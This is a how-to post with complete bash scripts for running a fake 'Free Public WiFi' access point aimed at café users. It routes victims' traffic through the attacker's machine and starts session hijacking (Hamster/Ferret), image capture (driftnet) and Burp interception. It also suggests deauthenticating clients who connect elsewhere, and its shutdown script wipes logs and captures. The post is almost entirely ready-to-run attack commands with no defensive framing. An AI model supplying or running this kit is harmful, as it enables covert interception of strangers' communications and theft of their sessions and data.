How-To: Setup and Maintain Fake AP

So you want to setup a fake access point for all those elite hacksters at Starbucks, but you don't know how, eh? Well, as luck would have it I know just what you want to do. So without further ado, here's what you need to do.

I'm assuming for all of this that you are using Backtrack 4, that you have hardware which is capable of packet injection/monitor mode, and that you have at least a base level of knowledge with Linux (i.e. I don't need to explain how to get online).

  • Start networking (if you haven't already):
service networking start
  • Get Internet access. If you need help configuring your wireless connection, you could always check out Wireless Configuration in Linux for guidance. If you're using WPA2 for your access (which you should be), you can use the WPA2 Configuration Script to do so.
  • Create a monitor interface for the interface which will be used for broadcast/injection (in this example "wlan0" is used):
airmon-ng start wlan0
  • Figure out what your monitor interface is:
ifconfig -a
  • Start the fake access point (in the examples, the monitor interface from above was "mon0"):
    • To create a promiscuous AP (one that doesn't broadcast a name, but will respond to any request/name):
airbase-ng -P mon0
  • Or…
    • To create a fake AP with a specified name (in this example, "Free Public WiFi"):
airbase-ng -P -e "Free Public WiFi" mon0
  • Find out what the AP interface is (normally starts with "at"):
ifconfig -a
  • Set the DHCP server to use the AP interface ("at0" is used in this example):
vi /etc/default/dhcp3-server

The only line needed is as follows:
INTERFACES="at0"
  • Setup the DHCP configuration to use a private subnet:
vi /etc/dhcp3/dhcpd.conf

Edit this to match how addresses will be handed out to the victims clients. In this example addresses in the range of 192.168.121.100 through 192.168.121.254 are being used, and the AP (the local computer) will have an address of 192.168.121.1. The DNS value should be your DNS server (or Google's, as is used in the example below).
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.121.0 netmask 255.255.255.0 {
  range 192.168.121.100 192.168.121.254;
  option routers 192.168.121.1;
  option domain-name-servers 8.8.8.8;
}
  • Start the external interface (again, this example is using the sample values shown in the previous steps… modify as needed to match what you used):
ifconfig at0 up 192.168.121.1 netmask 255.255.255.0
  • Start the DHCP server
service dhcp3-server start
  • Setup routing for packets to/from the fake AP (again, modify to match what you used if you didn't use the default values):
iptables -t nat -A POSTROUTING -o wlan0 -s 192.168.121.0/24 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

That's it! At this point you have a working AP (assuming you didn't muck anything up). From this point forward you can start grabbing traffic, modifying things, extracting data… the sky's the limit. For a couple of quick starting points, check out configuring and using Burp Suite and configuring and using Xplico.

And if someone is being all mean and not connecting to you (or was already connected to someone else), just deauth them.

And if you'd like a quick script that starts up everything for you and lets you choose how things will be done, give the following a try:

#!/bin/bash

#################################################
#
# Xylos' Quick-Fire Startup
#
#################################################

# Select a wireless interface to use for the AP
selectWirelessInterface () {
    iwconfig | grep 802 > /tmp/ethlist
    clear
    echo "-------------------------------------------------"
    echo "Available interfaces:"
    echo ""
    cat /tmp/ethlist
    echo ""
    echo "-------------------------------------------------"
    read -p "What interface will you for the soft AP? " -e wlan 
    rm /tmp/ethlist
}

# Start networking (if selected)
startNetworking () {
    read -p "Start networking [Y/N]? " -e ynanswer 
    if [ "$ynanswer" = "Y" ] ; then
        service networking start > /dev/null 2>&1
    fi
    selectWirelessInterface
    read -p "External USB WLAN present [Y/N]? " -e extusb
    if [ "$extusb" = "Y" ] ; then
       ifconfig $wlan up > /dev/null 2>&1
    fi
}

# Start a monitor on the first wlan adapter
createMonitor () {
    echo -n "Starting monitor device...           "
    ifconfig -a > /tmp/pre
    airmon-ng start $wlan 8 > /dev/null 2>&1 
    sleep 10 
    ifconfig -a > /tmp/post
    monint=`diff /tmp/pre /tmp/post | grep mon | awk '{ print $2 }'`
    echo "DONE"
    # echo "Detected monitor interface: $monint"
}

# Fire up the fake access point
createAP () {
    apname="Free Public WiFi"
    read -p "Use default ESSID [Free Public WiFi]? " -e usedef 
    if [ $usedef = "N" ] ; then
        read -p "What will the AP name be? " -e apname
    fi
    read -p "Promiscuous access point [Y/N]? " -e promisc 
    echo "AP name will be $apname"
    echo -n "Starting fake AP...                  "
    if [ $promisc = "Y" ] ; then
        airbase-ng -P -e $apname $monint > /tmp/ap_access_list &
    else
        airbase-ng -e $apname $monint > /tmp/ap_access_list &
    fi
    sleep 10 
    echo "DONE"
}

# Activate the external interface
activateExternalAccess () {
    echo -n "Enabling external access...          "
    ifconfig at0 up 192.168.121.1 netmask 255.255.255.0 mtu 1500 > /dev/null 2>&1 
    sleep 10 
    echo "DONE"
}

# Start the DHCP server (restart to kill any 
# current ones which may exist
startDHCP () {
    echo -n "Starting DHCP server...              "
    service dhcp3-server restart > /dev/null 2>&1 
    sleep 10
    echo "DONE"
}

# Route things from the fake AP to the world
routeAPClientsToWorld () {
    echo -n "Routing from fake AP to world...     "
    iptables -t nat -A POSTROUTING -o $wlan -s 192.168.121.0/24 -j MASQUERADE > /dev/null 2>&1
    sleep 5
    echo 1 > /proc/sys/net/ipv4/ip_forward
    echo "DONE"
}

# Fire up evil rodents
startRodents () {
    read -p "Start Hamster [Y/N]? " -e starthammy
    if [ $starthammy = "Y" ] ; then
        echo -n "Starting Hamster...                  "
        /pentest/sniffers/hamster/hamster &
        echo "DONE"
    fi
    read -p "Start Ferret [Y/N]? " -e startferry
    if [ $startferry = "Y" ] ; then
        echo -n "Starting Ferret...                   "
        /pentest/sniffers/hamster/ferret -i at0 &
        echo "DONE"
    fi
    read -p "Do you want to launch the Hamster web interface [Y/N]? " -e hamweb
    if [ $hamweb = "Y" ] ; then
        /usr/bin/firefox 127.0.0.1:1234
    fi
}

# Capture all image traffic across the network
captureImages () {
    read -p "Start driftnet [Y/N]? " -e startdrift
    if [ $startdrift = "Y" ] ; then
        read -p "Capture images [Y/N]? " -e ynanswer
        echo -n "Starting driftnet...                 "
        if [ $ynanswer = "Y" ] ; then
            driftnet -i at0 -a -d /tmp/driftimages
            echo "DONE"
            echo "Image files are stored in /tmp/driftimages"
        else
            driftnet -i at0
            echo "DONE"
        fi
    fi
}

# Start BurpSuite to perform detailed packet analysis
startBurp () {
    read -p "Start BurpSuite [Y/N]? " -e burpstart
    if [ $burpstart = "Y" ] ; then
        echo -n "Starting BurpSuite...               "
            /root/burpme.sh > /dev/null 2>&1
        echo "DONE"
    fi
}

#################################################
#
# Main Execution
#
#################################################

clear
echo "             Starting the Fun..."
echo "------------------------------------------"

startNetworking

echo "Get external internet access now, then"
read -p "press Enter to continue." -e throwaway

echo

createMonitor 
createAP
activateExternalAccess
startDHCP
routeAPClientsToWorld
#captureImages
#startRodents
startBurp

echo 
echo "--------------------------------------------"
echo
echo "Everything is running!"
echo
echo "To watch the access point activity, try:"
echo "tail -f /tmp/ap_access_list"
echo 
echo "Have fun!"

And if you want to shut down everything started by the above script, here's the way to do so (in the same format):

#!/bin/bash

#################################################
#
# Xylos' Quick-Fire Shutdown 
#
#################################################

# Stop networking
stopNetworking () {
    service networking stop > /dev/null 2>&1
}

# Start a monitor on the first wlan adapter
# If there are more than 3 of these you need
# to figure out where your life has gone wrong
stopMonitor () {
    echo -n "Stopping monitor device...           "
    airmon-ng stop mon0 > /dev/null 2>&1
    airmon-ng stop mon1 > /dev/null 2>&1
    airmon-ng stop mon2 > /dev/null 2>&1
    sleep 2
    echo "DONE"
}

# Stop the fake access point
killAP () {
    echo -n "Shutting down the fake AP...         "
    basepid=`ps -ef | grep -i [a]irbase | awk '{ print $2 }'`
    kill -9 $basepid > /dev/null 2>&1
    echo "DONE"
}

# Kill all external access
killExternalAccess () {
    echo -n "Killing external access...           "
    ifconfig at0 down > /dev/null 2>&1
    sleep 2 
    echo "DONE"
}

# Stop the DHCP server
stopDHCP () {
    echo -n "Stopping DHCP server...              "
    service dhcp3-server stop > /dev/null 2>&1
    sleep 2 
    echo "DONE"
}

# Kill routing and forwarding
noRouteAPClients () {
    echo -n "Killing routing...                   "
    iptables -t nat -D POSTROUTING -o wlan0 -s 192.168.121.0/24 -j MASQUERADE > /dev/null 2>&1
    echo 0 > /proc/sys/net/ipv4/ip_forward
    echo "DONE"
}

# Kill any logs or captures that were generated
killLogs () {
    echo -n "Killing logs...                      "
    rm -f /tmp/ap_access_list > /dev/null 2>&1
    rm -f /tmp/ethlist > /dev/null 2>&1
    rm -Rf /tmp/driftimages > /dev/null 2>&1
    rm -f /tmp/pre > /dev/null 2>&1
    rm -f /tmp/post > /dev/null 2>&1
    echo "DONE"
}

#################################################
#
# Main Execution
#
#################################################

clear
echo "        Clean Killing Everything..."
echo "------------------------------------------"
echo 
noRouteAPClients
stopDHCP
killExternalAccess
killAP
stopMonitor
stopNetworking
killLogs

echo 
echo "--------------------------------------------"
echo
echo "Shutdown complete!"
echo
Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 3.0 License